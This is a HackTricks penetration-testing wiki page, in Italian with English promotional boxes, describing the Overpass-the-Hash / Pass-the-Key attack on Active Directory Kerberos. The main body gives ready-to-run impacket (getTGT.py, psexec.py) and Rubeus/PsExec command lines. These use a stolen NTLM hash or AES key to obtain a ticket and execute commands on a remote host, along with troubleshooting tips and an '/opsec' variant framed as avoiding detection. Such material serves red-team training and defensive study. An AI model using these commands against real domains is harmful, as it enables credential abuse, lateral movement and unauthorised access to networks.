hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md

Over Pass the Hash/Pass the Key

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

{% embed url="https://websec.nl/" %}

Overpass The Hash/Pass The Key (PTK)

L'attacco Overpass The Hash/Pass The Key (PTK) è progettato per ambienti in cui il protocollo NTLM tradizionale è limitato e l'autenticazione Kerberos ha la precedenza. Questo attacco sfrutta l'hash NTLM o le chiavi AES di un utente per richiedere ticket Kerberos, consentendo l'accesso non autorizzato a risorse all'interno di una rete.

Per eseguire questo attacco, il primo passo consiste nell'acquisire l'hash NTLM o la password dell'account dell'utente target. Una volta ottenute queste informazioni, è possibile ottenere un Ticket Granting Ticket (TGT) per l'account, consentendo all'attaccante di accedere ai servizi o alle macchine a cui l'utente ha permessi.

Il processo può essere avviato con i seguenti comandi:

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

Per scenari che richiedono AES256, l'opzione -aesKey [AES key] può essere utilizzata. Inoltre, il ticket acquisito potrebbe essere impiegato con vari strumenti, inclusi smbexec.py o wmiexec.py, ampliando l'ambito dell'attacco.

Problemi riscontrati come PyAsn1Error o KDC cannot find the name sono tipicamente risolti aggiornando la libreria Impacket o utilizzando il nome host invece dell'indirizzo IP, garantendo la compatibilità con il KDC di Kerberos.

Una sequenza di comandi alternativa utilizzando Rubeus.exe dimostra un altro aspetto di questa tecnica:

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

Questo metodo rispecchia l'approccio Pass the Key, con un focus sul comando e l'utilizzo del ticket direttamente per scopi di autenticazione. È fondamentale notare che l'inizio di una richiesta TGT attiva l'evento 4768: A Kerberos authentication ticket (TGT) was requested, che indica un utilizzo di RC4-HMAC per impostazione predefinita, anche se i moderni sistemi Windows preferiscono AES256.

Per conformarsi alla sicurezza operativa e utilizzare AES256, è possibile applicare il seguente comando:

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Riferimenti

• https://www.tarlogic.com/es/blog/como-atacar-kerberos/

{% embed url="https://websec.nl/" %}

{% hint style="success" %} Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

• Controlla i piani di abbonamento!
• Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
• Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository github.

{% endhint %}